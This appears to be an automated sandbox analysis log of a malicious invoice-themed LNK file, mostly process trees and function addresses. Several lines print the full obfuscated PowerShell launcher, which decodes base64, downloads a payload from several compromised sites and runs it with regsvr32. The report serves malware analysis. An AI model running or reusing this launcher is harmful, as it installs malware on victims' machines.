                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024570
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E99C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001B3A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800079EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180009408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023C14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023624
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002582C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000B834
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180017638
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000403C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004E3C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020E40
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021444
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012044
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016054
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001705C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015A64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015264
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000A26C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001870
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001F878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180007678
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001667C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012680
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180014484
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001E88
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000968C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022290
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BC98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000529C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180008C9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020AA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800078A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001F0A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022AAC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E4AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800048B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001ACB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180007EB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800090B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800162BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800270C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800024C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800280C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001AEC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800050D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800234D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001F6DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800026DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002ADC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002ACE8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800150F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E2F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016AF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000DEF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001DEFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024104
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006308
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001370C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFFE21E7FF0 appears 31 times
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFFE21EB3B0 appears 148 times
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFFE21EBD70 appears 113 times
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: Rechnungskorrektur 2022.20.05_1305.lnkReversingLabs: Detection: 39%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\JydgVvbPD\MevgMvopaw.BUS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\JydgVvbPD\MevgMvopaw.BUS
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll"
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220523Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjimkgkg.bpr.ps1Jump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winLNK@23/11@1/4
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7120:120:WilError_01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C892 push ebp; retf
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D095 push B3B8007Eh; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D0F3 push ebp; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013551 push ebx; retf
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D15D push ebx; retn 0068h
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000CDA8 push ebp; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000CE36 push 458B0086h; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013551 push ebx; retf
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21F12E3 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: MevgMvopaw.BUS.2.drStatic PE information: real checksum: 0x654f5 should be: 0x5a4e0
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll"

                    Persistence and Installation Behavior

                    barindex
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
